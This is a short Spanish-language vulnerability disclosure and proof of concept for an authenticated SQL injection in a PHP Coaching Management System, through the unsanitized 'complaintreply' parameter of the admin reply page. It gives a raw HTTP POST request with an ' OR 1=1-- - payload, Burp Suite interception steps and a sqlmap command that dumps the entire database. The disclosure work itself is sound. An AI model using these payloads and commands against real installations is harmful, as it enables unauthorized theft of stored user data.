
Prueba de concepto para inyección SQL autenticada en Coaching Management System, que demuestra el volcado de la base de datos mediante el parámetro no saneado complaintreply.
Existe una vulnerabilidad de Inyección SQL en el Coaching Management System en PHP. El parámetro complaintreply en la funcionalidad de respuesta del administrador no se sanitiza correctamente antes de usarse en consultas SQL. Un atacante autenticado (Administrador) puede inyectar consultas SQL maliciosas, lo que conduce a la extracción completa de la base de datos.
/cims/modules/admin/reply.phpcomplaintreplycode-projects.org
Coaching Management System en PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/
Desconocida (Probado en la última versión disponible a abril de 2026)
El estudiante envía una queja 
El administrador abre la queja y accede a la función de respuesta
POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded
complaintreply=' OR 1=1-- -&submit=submit

Interceptar la solicitud mediante Burp Suite 
Inyectar el payload:
'

Se observó un error SQL
7. Confirmar la inyección:
' OR 1=1-- -

Volcar la base de datos usando:
sqlmap -r sqli.txt --dump

Severidad: CRÍTICA